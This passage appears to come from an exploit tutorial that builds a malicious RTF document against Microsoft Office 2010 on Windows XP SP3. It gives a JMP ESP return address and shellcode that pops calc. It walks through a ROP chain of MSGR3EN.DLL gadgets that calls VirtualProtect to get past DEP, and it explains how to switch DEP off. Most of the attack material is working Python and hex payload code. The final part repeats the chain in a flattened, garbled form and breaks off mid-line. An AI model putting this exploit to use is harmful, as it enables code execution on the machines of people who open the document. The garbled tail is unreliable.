We will also have to bypass DEP (Data Execution Prevention), because Office 2010 opts into DEP by default. I hope you're familiar with DEP, but if not, here's a brief description: "Data Execution Prevention (DEP) is a security feature included in modern operating systems. It is known to be available in Linux, Mac OS X, iOS, Microsoft Windows and Android operating systems and is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow." Don't worry and don't get confused: I will explain every line in detail, so that by the end of this article you will know how to run the exploit. Keep one thing in mind, though: in order to run the Office 2007 exploit on Office 2010, you first have to change the JMP ESP address, which I already covered in my previous post. I won't repeat that code here, to keep this post from getting unnecessarily long. So first, let's find a JMP ESP address for the Office 2010 test system.
I found a JMP ESP instruction at 0x7C86467B in kernel32.dll. Note that this is the kernel32.dll of the Windows XP SP3 test machine, so the address belongs to the operating system rather than to Office, and it will differ on other service packs and Windows versions. Let's write this address into the Office 2007 exploit sample. Since x86 is little-endian, the address has to be written in reverse byte order: 0x7C86467B becomes the bytes 7B 46 86 7C, and because this RTF sample carries its overflow data as hex text (two characters per byte), it ends up in the file as the eight characters 7b46867c.
<2f909378> is the return address used in the Office 2007 exploit. Replace it with the Office 2010 JMP ESP address as explained above.
<Office 2010 JMP ESP address> Now let's try to run this exploit on Office 2010. Instead of calc, we get an error message, as shown in the following picture.
In Windows, this is a Data Execution Prevention error. For demo purposes, let's first disable DEP and see what happens. Will calc pop after disabling DEP? Yes, of course. To disable DEP on Windows XP, open boot.ini as an administrator (Start → Run → cmd, then cd \ and notepad boot.ini; the file is hidden and read-only, so clear those attributes first) and change the /noexecute switch from OptIn to AlwaysOff. On Windows Vista and later there is no boot.ini; the equivalent is bcdedit /set nx AlwaysOff from an elevated prompt.
Save and reboot the system, then double-click the sample. If everything is fine, calc pops. It works!
Data Execution Prevention has been on by default since XP SP2, so disabling DEP and then running the exploit is not a realistic option: an attacker cannot edit boot.ini on the victim's machine, and doing so needs administrator rights and a reboot anyway. We did this only as a demo. Our real objective in this article is bypassing DEP, so before looking at the mechanism, let's discuss DEP in a bit more detail.

Hardware DEP takes advantage of the NX ("No Execute page protection", AMD specification) or XD ("Execute Disable", Intel specification) bit on DEP-compatible CPUs and marks certain parts of memory that should only contain data (the default heap, the stack, memory pools) as non-executable. When an attempt is made to execute code from a DEP-protected page, an access violation (STATUS_ACCESS_VIOLATION, 0xC0000005) occurs. In most cases this results in process termination (unhandled exception). So when a developer wants code to run from a certain memory page, he has to allocate that memory and mark it executable. Support for hardware DEP was introduced in Windows XP SP2 and Windows Server 2003 SP1 and has been part of every Windows version since. How DEP behaves within the OS is based on a system-wide policy that can be set to one of the following values:

- OptIn: only a limited set of Windows system modules and binaries are protected by DEP; other programs are protected only if they opt in themselves (Office 2010 does, which is why our sample fails).
- OptOut: all programs, processes and services on the system are protected, except those explicitly placed on the exception list.
- AlwaysOn: all programs, processes and services are protected and no exceptions are allowed.
- AlwaysOff: DEP is turned off.

OptIn is the default on client Windows and OptOut on the server editions. You can check the policy of a machine with wmic OS Get DataExecutionPrevention_SupportPolicy (0 = AlwaysOff, 1 = AlwaysOn, 2 = OptIn, 3 = OptOut), and the DEP column in Process Explorer shows whether a given process, such as WINWORD.EXE, is actually protected.
Ok, we will discuss later how to bypass DEP, but for now you may be curious about the actual exploit code that pops calc. I don't want to make this post too long, but to make it understandable I have to give the complete code. It builds the RTF document from two kinds of pieces: the RTF header is given as raw bytes in hex, and everything from the overflowing shape property onwards is hex text as Word decodes it (two characters per byte, so a dword is eight characters in little-endian order):

[code]
# Python 3. The RTF header as raw bytes in hex (it contains CR/LF and TAB, so it is kept in hex).
# It ends inside the shape property "{\sn1<TAB>pfRaGMeNTs}{\sv 1;1;0..." whose value overflows.
header = bytes.fromhex(
    "7B5C727466315C616465666C616E6731" "3032355C616E73695C616E7369637067"
    "3933365C7563325C6164656666305C64" "656666305C7374736866646263683133"
    "5C73747368666C6F6368305C73747368" "6668696368305C73747368666269305C"
    "6465666C616E67313033335C6465666C" "616E676665323035327B5C666F6E7474"
    "626C7B5C66305C66726F6D616E5C6663" "686172736574305C66707271327B5C2A"
    "5C70616E6F7365203032303230363033" "3035303430353032303330347D54696D"
    "6573204E657720526F6D616E3B7D7B5C" "6631335C666E696C5C66636861727365"
    "743133345C66707271327B5C2A5C7061" "6E6F7365203032303130363030303330"
    "3130313031303130317D5C2763625C27" "63655C2763635C2765357B5C2A5C6661"
    "6C742053696D53756E7D3B7D0D0A7B5C" "6633365C666E696C5C66636861727365"
    "743133345C66707271327B5C2A5C7061" "6E6F7365203032303130363030303330"
    "3130313031303130317D405C2763625C" "2763655C2763635C2765353B7D7B5C66"
    "33375C66726F6D616E5C666368617273" "65743233385C66707271322054696D65"
    "73204E657720526F6D616E2043453B7D" "7B5C6633385C66726F6D616E5C666368"
    "61727365743230345C66707271322054" "696D6573204E657720526F6D616E2043"
    "79723B7D7B5C6634305C66726F6D616E" "5C66636861727365743136315C667072"
    "71322054696D6573204E657720526F6D" "616E20477265656B3B7D0D0A7B5C6634"
    "315C66726F6D616E5C66636861727365" "743136325C66707271322054696D6573"
    "204E657720526F6D616E205475723B7D" "7B5C6634325C6662696469205C66726F"
    "6D616E5C66636861727365743137375C" "66707271322054696D6573204E657720"
    "526F6D616E2028486562726577293B7D" "7B5C6634335C6662696469205C66726F"
    "6D616E5C66636861727365743137385C" "66707271322054696D6573204E657720"
    "526F6D616E2028417261626963293B7D" "7B5C6634345C66726F6D616E5C666368"
    "61727365743138365C66707271322054" "696D6573204E657720526F6D616E2042"
    "616C7469633B7D0D0A7B5C6634355C66" "726F6D616E5C66636861727365743136"
    "335C66707271322054696D6573204E65" "7720526F6D616E2028566965746E616D"
    "657365293B7D7B5C663136395C666E69" "6C5C6663686172736574305C66707271"
    "322053696D53756E205765737465726E" "7B5C2A5C66616C742053696D53756E7D"
    "3B7D7B5C663339395C666E696C5C6663" "686172736574305C667072713220405C"
    "2763625C2763655C2763635C27653520" "5765737465726E3B7D7D7B5C636F6C6F"
    "7274626C3B5C726564305C677265656E" "305C626C7565303B5C726564305C6772"
    "65656E305C626C75653235353B5C7265" "64305C677265656E3235355C626C7565"
    "3235353B0D0A5C726564305C67726565" "6E3235355C626C7565303B5C72656432"
    "35355C677265656E305C626C75653235" "353B5C7265643235355C677265656E30"
    "5C626C7565303B5C7265643235355C67" "7265656E3235355C626C7565303B5C72"
    "65643235355C677265656E3235355C62" "6C75653235353B5C726564305C677265"
    "656E305C626C75653132383B5C726564" "305C677265656E3132385C626C756531"
    "32383B5C726564305C677265656E3132" "385C626C7565303B5C7265643132385C"
    "677265656E305C626C75653132383B5C" "7265643132385C677265656E305C626C"
    "7565303B5C7265643132385C67726565" "6E3132385C626C7565303B0D0A5C7265"
    "643132385C677265656E3132385C626C" "75653132383B5C7265643139325C6772"
    "65656E3139325C626C75653139323B7D" "7B5C7374796C6573686565747B5C716A"
    "205C6C69305C7269305C6E6F77696463" "746C7061725C7772617064656661756C"
    "745C617370616C7068615C6173706E75" "6D5C66616175746F5C61646A75737472"
    "696768745C72696E305C6C696E305C69" "74617030205C72746C63685C66637331"
    "205C6166305C61667332345C616C616E" "6731303235205C6C747263685C666373"
    "30200D0A5C667332315C6C616E673130" "33335C6C616E676665323035325C6B65"
    "726E696E67325C6C6F63685C66305C68" "6963685C6166305C646263685C616631"
    "335C63677269645C6C616E676E703130" "33335C6C616E6766656E703230353220"
    "5C736E65787430204E6F726D616C3B7D" "7B5C2A5C63733130205C616464697469"
    "7665205C7373656D6968696464656E20" "44656661756C74205061726167726170"
    "6820466F6E743B7D7B5C2A0D0A5C7473" "31315C7473726F77645C747266747357"
    "6964746842335C7472706164646C3130" "385C747270616464723130385C747270"
    "616464666C335C747270616464667433" "5C7472706164646662335C7472706164"
    "646672335C74726362706174315C7472" "6366706174315C74626C696E64305C74"
    "626C696E6474797065335C747363656C" "6C7769647468667473305C7473766572"
    "74616C745C747362726472745C747362" "7264726C5C747362726472625C747362"
    "726472725C74736272647264676C5C74" "73627264726467725C74736272647268"
    "5C74736272647276200D0A5C716C205C" "6C69305C7269305C77696463746C7061"
    "725C7772617064656661756C745C6173" "70616C7068615C6173706E756D5C6661"
    "6175746F5C61646A7573747269676874" "5C72696E305C6C696E305C6974617030"
    "205C72746C63685C66637331205C6166" "305C6166733230205C6C747263685C66"
    "637330205C667332305C6C616E673130" "32345C6C616E676665313032345C6C6F"
    "63685C66305C686963685C6166305C64" "6263685C616631335C63677269645C6C"
    "616E676E70313032345C6C616E676665" "6E7031303234205C736E657874313120"
    "5C7373656D6968696464656E204E6F72" "6D616C205461626C653B7D7D0D0A7B5C"
    "2A5C6C6174656E747374796C65735C6C" "73647374696D61783135365C6C73646C"
    "6F636B6564646566307D7B5C2A5C7273" "696474626C205C727369643135383037"
    "3531397D7B5C2A5C67656E657261746F" "72204D6963726F736F667420576F7264"
    "2031312E302E303030303B7D7B5C696E" "666F7B5C7469746C6520466666666666"
    "6666667D7B5C617574686F7220555345" "527D7B5C6F70657261746F7220555345"
    "527D7B5C6372656174696D5C79723230" "31315C6D6F345C647931325C68723134"
    "5C6D696E35307D7B5C72657674696D5C" "7972323031315C6D6F345C647931325C"
    "687231345C6D696E35317D7B5C766572" "73696F6E317D0D0A7B5C65646D696E73"
    "317D7B5C6E6F667061676573317D7B5C" "6E6F66776F726473317D7B5C6E6F6663"
    "68617273397D7B5C2A5C636F6D70616E" "79204348494E417D7B5C6E6F66636861"
    "72737773397D7B5C7665726E32343631" "337D7B5C2A5C70617373776F72642030"
    "303030303030307D7D7B5C2A5C786D6C" "6E7374626C207B5C786D6C6E73312068"
    "7474703A2F2F736368656D61732E6D69" "63726F736F66742E636F6D2F6F666669"
    "63652F776F72642F323030332F776F72" "646D6C7D7D0D0A5C7061706572773131"
    "3930365C70617065726831363833385C" "6D6172676C313830305C6D6172677231"
    "3830305C6D61726774313434305C6D61" "726762313434305C677574746572305C"
    "6C747273656374200D0A5C6465667461" "623432305C66746E626A5C61656E6464"
    "6F635C646F6E6F74656D626564737973" "666F6E74315C646F6E6F74656D626564"
    "6C696E6764617461305C677266646F63" "6576656E7473305C76616C6964617465"
    "786D6C315C73686F77706C616365686F" "6C6474657874305C69676E6F72656D69"
    "786564636F6E74656E74305C73617665" "696E76616C6964786D6C305C73686F77"
    "786D6C6572726F7273315C666F726D73" "686164655C686F727A646F635C64676D"
    "617267696E5C64676873706163653138" "305C64677673706163653135365C6467"
    "686F726967696E313830305C6467766F" "726967696E313434305C64676873686F"
    "77300D0A5C64677673686F77325C6A63" "6F6D70726573735C6C6E6F6E67726964"
    "5C766965776B696E64315C7669657773" "63616C653130305C73706C7974776E69"
    "6E655C66746E6C7974776E696E655C68" "746D61757473705C7573656C7462616C"
    "6E5C616C6E74626C696E645C6C797463" "616C6374626C77645C6C797474626C72"
    "7467725C6C6E62726B72756C655C6E6F" "62726B77727074626C5C766965776E6F"
    "626F756E64315C736E6170746F677269" "64696E63656C6C5C616C6C6F77666965"
    "6C64656E6473656C5C77727070756E63" "745C617369616E62726B72756C655C72"
    "736964726F6F7431353830373531390D" "0A5C6E657774626C73747972756C735C"
    "6E6F67726F776175746F666974207B5C" "2A5C666368617273200D0A21292C2E3A"
    "5C2733623F5D5C2737645C2761315C27" "61375C2761315C2761345C2761315C27"
    "61365C2761315C2761355C2761385C27" "34345C2761315C2761635C2761315C27"
    "61665C2761315C2762315C2761315C27" "61645C2761315C2763335C2761315C27"
    "61325C2761315C2761335C2761315C27" "61385C2761315C2761395C2761315C27"
    "62355C2761315C2762375C2761315C27" "62395C2761315C2762625C2761315C27"
    "62665C2761315C2762335C2761315C27" "62645C2761335C2761315C2761335C27"
    "61325C2761335C2761375C2761335C27" "61395C2761335C2761635C2761335C27"
    "61655C2761335C2762615C2761335C27" "62625C2761335C2762665C2761335C27"
    "64645C2761335C2765305C2761335C27" "66635C2761335C2766645C2761315C27"
    "61625C2761315C2765390D0A7D7B5C2A" "5C6C636861727320285B5C2737625C27"
    "61315C2761345C2761315C2761655C27" "61315C2762305C2761315C2762345C27"
    "61315C2762365C2761315C2762385C27" "61315C2762615C2761315C2762655C27"
    "61315C2762325C2761315C2762635C27" "61335C2761385C2761335C2761655C27"
    "61335C2764625C2761335C2766625C27" "61315C2765615C2761335C2761347D5C"
    "666574307B5C2A5C77677266666D7466" "696C74657220303133667D5C696C666F"
    "6D61636174636C6E7570305C6C747270" "6172205C7365637464205C6C74727365"
    "63740D0A5C6C696E6578305C68656164" "6572793835315C666F6F746572793939"
    "325C636F6C73783432355C656E646E68" "6572655C736563746C696E6567726964"
    "3331325C73656374737065636966796C" "5C7366746E626A207B5C2A5C706E7365"
    "636C766C315C706E7563726D5C706E73" "74617274315C706E696E64656E743732"
    "305C706E68616E67207B5C706E747874" "61205C64626368202E7D7D7B5C2A5C70"
    "6E7365636C766C325C706E75636C7472" "5C706E7374617274315C706E696E6465"
    "6E743732305C706E68616E67207B5C70" "6E74787461205C64626368202E7D7D7B"
    "5C2A5C706E7365636C766C330D0A5C70" "6E6465635C706E7374617274315C706E"
    "696E64656E743732305C706E68616E67" "207B5C706E74787461205C6462636820"
    "2E7D7D7B5C2A5C706E7365636C766C34" "5C706E6C636C74725C706E7374617274"
    "315C706E696E64656E743732305C706E" "68616E67207B5C706E74787461205C64"
    "62636820297D7D7B5C2A5C706E736563" "6C766C355C706E6465635C706E737461"
    "7274315C706E696E64656E743732305C" "706E68616E67207B5C706E7478746220"
    "5C6462636820287D7B5C706E74787461" "205C6462636820297D7D7B5C2A5C706E"
    "7365636C766C365C706E6C636C74725C" "706E7374617274315C706E696E64656E"
    "743732305C706E68616E67200D0A7B5C" "706E74787462205C6462636820287D7B"
    "5C706E74787461205C6462636820297D" "7D7B5C2A5C706E7365636C766C375C70"
    "6E6C63726D5C706E7374617274315C70" "6E696E64656E743732305C706E68616E"
    "67207B5C706E74787462205C64626368" "20287D7B5C706E74787461205C646263"
    "6820297D7D7B5C2A5C706E7365636C76" "6C385C706E6C636C74725C706E737461"
    "7274315C706E696E64656E743732305C" "706E68616E67207B5C706E7478746220"
    "5C6462636820287D7B5C706E74787461" "205C6462636820297D7D7B5C2A5C706E"
    "7365636C766C395C706E6C63726D5C70" "6E7374617274315C706E696E64656E74"
    "3732305C706E68616E67200D0A7B5C70" "6E74787462205C6462636820287D7B5C"
    "706E74787461205C6462636820297D7D" "5C706172645C706C61696E205C6C7472"
    "7061725C716A205C6C69305C7269305C" "6E6F77696463746C7061725C77726170"
    "64656661756C745C617370616C706861" "5C6173706E756D5C66616175746F5C61"
    "646A75737472696768745C72696E305C" "6C696E305C6974617030205C72746C63"
    "685C66637331205C6166305C61667332" "345C616C616E6731303235205C6C7472"
    "63685C66637330200D0A5C667332315C" "6C616E67313033335C6C616E67666532"
    "3035325C6B65726E696E67325C6C6F63" "685C6166305C686963685C6166305C64"
    "6263685C616631335C63677269645C6C" "616E676E70313033335C6C616E676665"
    "6E7032303532207B5C72746C63685C66" "637331205C616630205C6C747263685C"
    "66637330205C696E7372736964313538" "3037353139205C686963685C6166305C"
    "646263685C616631335C6C6F63685C66" "3020467D7B5C72746C63685C66637331"
    "205C616630205C6C747263685C666373" "30205C696E7372736964313538303735"
    "3139205C686963685C6166305C646263" "685C616631335C6C6F63687D7B5C7368"
    "707B5C73707B5C736E31097066526147" "4D654E54737D7B5C737620313B313B30"
    "3131313131313131666630333030303030"
    "30303030303030303030303030303030" "30303030303030303030303030303030"
    "303030"
)

# From here on the file holds hex text: Word turns every two characters into one byte of the
# overflow buffer, so each dword is written as eight characters in little-endian order.
jmpesp = b"7b46867c"   # 0x7C86467B: JMP ESP in kernel32.dll (XP SP3), reversed byte order
header2 = b"0000807c0000807cBBBBBBBBCCCCCCCCDDDDDDDD9090"   # filler dwords, then NOP NOP
magic = (                # shellcode (pops calc.exe) written as hex text
    b"83ec40dbc031c9bf7c1670" b"ccd97424f4b11e58" b"31781883e8fc0378"
    b"68f4853078bc65c9" b"78b623f5f3b4ae7d" b"02aa3a321cbf62ed"
    b"1d54d5662921e796" b"60f571ca0635f514" b"c77cfb1b056bf027"
    b"dd48fd22381ba2e8" b"c3f73b7acf4c4f23" b"d353a457f7d83b83"
    b"8e831f57536451a1" b"33cdf5c6f5c17e98" b"f5aaf105a826993d"
    b"3bc0d9fe5161b60e" b"2f851987b7782f59" b"907bd7057fe87bca"
)
# 84 runs of eight "61" pairs plus one more, as in the listing: 673 bytes of 'a' (0x61)
# filler after the shellcode, then the closing braces of the RTF document.
footer = b"6161616161616161" * 84 + b"61}}}}"

payload = header + jmpesp + header2 + magic + footer
with open("exp.doc", "wb") as f:
    f.write(payload)
[/code]

Now, let's discuss how to bypass DEP. Since we can't execute our own code on the stack, the only thing we can do is execute existing instructions or call existing functions from loaded modules, using data on the stack as the parameters for those functions and instructions.
There are various functions that can be used to bypass DEP, for example:

- VirtualAlloc
- HeapCreate
- SetProcessDEPPolicy
- VirtualProtect
- WriteProcessMemory

Of these, for simplicity's sake, I will use VirtualProtect. The objective is to change the protection of the stack area that holds our shellcode to executable, so that the shellcode can run. Now I will show a practical, live example; I hope a single worked case explains it better than several lengthy ones.

VirtualProtect()
The VirtualProtect function changes the access protection of a region of memory in the calling process:

[code]
BOOL WINAPI VirtualProtect(
  __in  LPVOID lpAddress,
  __in  SIZE_T dwSize,
  __in  DWORD  flNewProtect,
  __out PDWORD lpflOldProtect
);
[/code]

To call it from a ROP chain you have to lay out five dwords on the stack: the address VirtualProtect will return to, followed by its four parameters. On XP SP3, VirtualProtect() is located at 0x7C801AD4 in kernel32.dll, but the chain below does not hardcode that address: it reads it through a pointer to VirtualProtect stored inside MSGR3EN.DLL, so it keeps working if kernel32.dll is not the one on my machine. There are two ways to build the chain: manually, or with a tool that does it automatically. Here is how to do it manually. To bypass DEP this way you have to set every parameter of VirtualProtect, and to do that you need ROP gadgets (a gadget is a short instruction sequence ending in a return, taken from a module the application has loaded). I have selected MSGR3EN.DLL, which Office loads together with WINWORD.EXE and which sits at a fixed address in this setup, so the gadget addresses below are stable from run to run. In this example I will use VirtualProtect() to modify the protection of the memory page where the shellcode is located. The function needs the following values, explained below:
- return address: the address control returns to when VirtualProtect finishes, i.e. the address of your shellcode. It depends on where the stack lands, so the chain has to compute it at run time.
- lpAddress: a pointer to the memory where the shellcode is placed. Since the shellcode is on the stack, this is also computed at run time (here it is the same value as the return address).
- dwSize: the size in bytes of the region to change; 0x5DC (1500) is used below, enough to cover the shellcode.
- flNewProtect: the new protection flag. To make the stack area executable and keep it writable this is 0x40 (PAGE_EXECUTE_READWRITE), which is what the chain below passes.
- lpflOldProtect: a pointer to a writable DWORD where VirtualProtect stores the old protection value. Any writable address works; the chain uses 0x3F3B1310 inside MSGR3EN.DLL.

Now we will set all the parameters and call VirtualProtect. These are the gadgets used (all from MSGR3EN.DLL):

[code]
#0x3F208016 : # RETN [Module : MSGR3EN.DLL]
#0x3F208016 : # RETN [Module : MSGR3EN.DLL]
#0x3F208016 : # RETN [Module : MSGR3EN.DLL]
#0x3F208016 : # RETN [Module : MSGR3EN.DLL]
#0x3F208016 : # RETN [Module : MSGR3EN.DLL]
#0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN [Module : MSGR3EN.DLL]
#0x3F39FC28 : # MOV EAX,EDI # POP ESI # RETN [Module : MSGR3EN.DLL]
#0x3F3513A0 : # ADD ESP,20 # RETN 4 [Module : MSGR3EN.DLL]
#0x3F2EF6BF : # XCHG EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL]
#0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL]
#0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL]
#0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL]   (x4)
#0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL]
#0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL]
#0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL]
#0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL]
#0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL]   (x8)
#0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL]
#0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F2FED4C : # POP EAX # RETN [Module : MSGR3EN.DLL]
#0x3F2B745E : # MOV ECX,DWORD PTR DS:[EAX] # RETN [Module : MSGR3EN.DLL]
#0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL]
#0x3F39D730 : # ADD EAX,8 # RETN [Module : MSGR3EN.DLL]   (x3)
#0x3F2FDA08 : # XCHG EAX,ESP # RETN [Module : MSGR3EN.DLL]
[/code]

So let me explain this in some detail. I found the above instructions in MSGR3EN.DLL, which is loaded at run time when Office starts. The rule of thumb for a ROP chain is to take the instructions from a module that is loaded together with the application, so that the addresses are there every time the document is opened. Now we use those instructions to set all the parameters for VirtualProtect and make the stack area executable. Every dword is written as eight hex characters in little-endian order, so the 41414141 padding dwords and the two values the chain patches at run time are easy to spot:

[code]
# ----------------------- put Stack Pointer in EAX & EDI ----------------------- #
rop  = b"8546393f"      # 0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN
rop += b"41414141"      # Padding for POP ESI
rop += b"28fc393f"      # 0x3F39FC28 : # MOV EAX,EDI # POP ESI # RETN
rop += b"41414141"      # Padding for POP ESI
rop += b"a013353f"      # 0x3F3513A0 : # ADD ESP,20 # RETN 4  (steps over the parameter block below)
rop += b"41414141" * 2  # Padding for JUMP
# ------------------- Parameters for VirtualProtect() -------------------------- #
VirtualProtect  = b"825a203f"  # 0x3F205A82 : # JMP ECX | Call VirtualProtect()
VirtualProtect += b"41414141"  # Return Address (patched at run time by param1 with the shellcode address)
VirtualProtect += b"42424242"  # lpAddress      (patched at run time by param2 with the shellcode address)
VirtualProtect += b"dc050000"  # dwSize 0x5DC = 1500
VirtualProtect += b"40000000"  # flNewProtect 0x40 = PAGE_EXECUTE_READWRITE
VirtualProtect += b"10133b3f"  # lpflOldProtect: writeable address 0x3F3B1310
# -------------------- Setting 1st Parameter ----------------------------------- #
# The XCHG moves the saved stack pointer S (ESP at the PUSH ESP gadget) into EDX, where it stays
# for the rest of the chain. param1 computes S + 0x140 in EAX, makes ESI = S + 4 and stores EAX
# at [ESI+0x18] = S + 0x1C, which is the Return Address slot of the block above.
param1  = b"bff62e3f"      # 0x3F2EF6BF : # XCHG EAX,EDX # RETN
param1 += b"41414141"      # Padding for ADD ESP,20 # RETN 4
param1 += b"8c58343f"      # 0x3F34588C : # MOV EAX,EDX # RETN
param1 += b"ef94303f"      # 0x3F3094EF : # XCHG EAX,ESI # RETN
param1 += b"8c58343f"      # 0x3F34588C : # MOV EAX,EDX # RETN
param1 += b"f782393f"      # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN
param1 += b"41414141"      # Padding for POP EBP
param1 += b"e982393f"      # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN
param1 += b"41414141"      # Padding for POP EBP
param1 += b"8aa02c3f" * 4  # 0x3F2CA08A : # INC ESI # RETN  (four times: ESI = S + 4)
param1 += b"1197363f"      # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4
param1 += b"41414141"      # Padding for POP EDI
param1 += b"41414141"      # Padding for POP ESI
# -------------------- Setting 2nd Parameter ----------------------------------- #
# Same again with eight INC ESI, so ESI = S + 8 and the store lands on the lpAddress slot (S + 0x20).
param2  = b"8c58343f"      # 0x3F34588C : # MOV EAX,EDX # RETN
param2 += b"41414141"      # Padding for RETN 4
param2 += b"ef94303f"      # 0x3F3094EF : # XCHG EAX,ESI # RETN
param2 += b"8c58343f"      # 0x3F34588C : # MOV EAX,EDX # RETN
param2 += b"f782393f"      # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN
param2 += b"41414141"      # Padding for POP EBP
param2 += b"e982393f"      # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN
param2 += b"41414141"      # Padding for POP EBP
param2 += b"8aa02c3f" * 8  # 0x3F2CA08A : # INC ESI # RETN  (eight times: ESI = S + 8)
param2 += b"1197363f"      # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4
param2 += b"41414141"      # Padding for POP EDI
param2 += b"41414141"      # Padding for POP ESI
# ------------------------- Fetch & Call VirtualProtect() address --------------------- #
# Load ECX with VirtualProtect's address through the pointer in MSGR3EN.DLL, then move ESP back
# to the parameter block (S + 0x18) so that the final RETN lands on the JMP ECX gadget.
call  = b"8c58343f"      # 0x3F34588C : # MOV EAX,EDX # RETN
call += b"41414141"      # Padding for RETN 4
call += b"4ced2f3f"      # 0x3F2FED4C : # POP EAX # RETN
call += b"0811103f"      # PTR to VirtualProtect() (0x3F101108)
call += b"5e742b3f"      # 0x3F2B745E : # MOV ECX,DWORD PTR DS:[EAX] # RETN
call += b"8c58343f"      # 0x3F34588C : # MOV EAX,EDX # RETN
call += b"30d7393f" * 3  # 0x3F39D730 : # ADD EAX,8 # RETN  (three times: EAX = S + 0x18)
call += b"08da2f3f"      # 0x3F2FDA08 : # XCHG EAX,ESP # RETN
[/code]

Now it is time to put the complete exploit together:

[code]
#!/usr/bin/python3
import struct
import binascii

# RTF shape structure whose property value overflows. The non-printable-free start is still given
# as raw bytes in hex up to the "9;2;ffffffffff" marker; the filler that follows is written as text.
header = bytes.fromhex(
    "7B5C7368707B5C73707D7D"
    "7B5C7368707B5C73707D7D7B5C7368707B"
    "5C73707D7D7B5C237368707B5C2A5C7368"
    "70696E73745C73687066686472305C2373"
    "68706278636F6C756D6E5C736870627970"
    "6172615C736820707772327D7B5C73707B"
    "7B5C736E207B7D7B7D7B5C736E7D7B5C73"
    "6E7D7B7B5C2A5C2A7D7D70467261676D65"
    "6E74737D7B5C2A5C2A5C2A7D7B235C7376"
    "7B5C2A5C2A5C2A5C2A5C2A5C2A5C2A5C2A"
    "5C2A5C2A5C2A5C2A5C2A5C2A5C2A5C2A5C"
    "2A5C2A5C2A5C2A5C2A5C2A5C2A5C2A5C2A"
    "5C2A7D393B323B66666666666666666666"
)
header += b"#" * (17 * 31 + 8)     # '#' filler: the listing has 31 runs of 17 plus 8 more
header += b"050000A" + b"0" * 35   # the characters that close the header in the listing

# Main Control
Main = b"1780203f"   # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **  (note: these bytes encode 0x3F208017; the listing does not say which is intended)
req = b"1" * 32 + b"0" * 8   # offsets 00000060..00000070 in the listing
control  = b"1780203f"   # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **
control += b"1780203f"   # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **
control += b"1780203f"   # 0x3F208016 : # RETN [Module :
[/code]
MSGR3EN.DLL] ** control += “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** control += “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** #———————–put Stack Pointer in EAX & EDI ————————–# rop = “8546393f” # 0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN [Module : MSGR3EN.DLL] ** rop += “41414141” # Padding for POP ESI rop += “28fc393f” # 0x3F39FC28 : # MOV EAX,EDI # POP ESI # RETN [Module : MSGR3EN.DLL] ** rop += “41414141” # Padding for POP ESI rop += “a013353f” # 0x3F3513A0 : 20 : # ADD ESP,20 # RETN 4 – MSGR3EN.DLL – ** rop += “41414141” * 2 # Padding for JUMP #——————-Parameters for VirtualProtect() —————————-# VirtualProtect = “825a203f” # 0x3f205a82 : # JMP ECX | Call VirtualProtect() VirtualProtect += “41414141” # Return Address VirtualProtect += “42424242” # lpAdress VirtualProtect += “dc050000” # Size 1500 VirtualProtect += “40000000” # flNewProtect VirtualProtect += “10133b3f” # Writeable Address 3F3B1310 #——————– Setting 1st Parameter ————————————–# param1 = “bff62e3f” # 0x3F2EF6BF : # XCHG EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for ADD ESP,20 # RETN 4 param1 += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param1 += “ef94303f” # 0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param1 += “f782393f” # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for POP EBP param1 += “e982393f” # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for POP EBP param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # 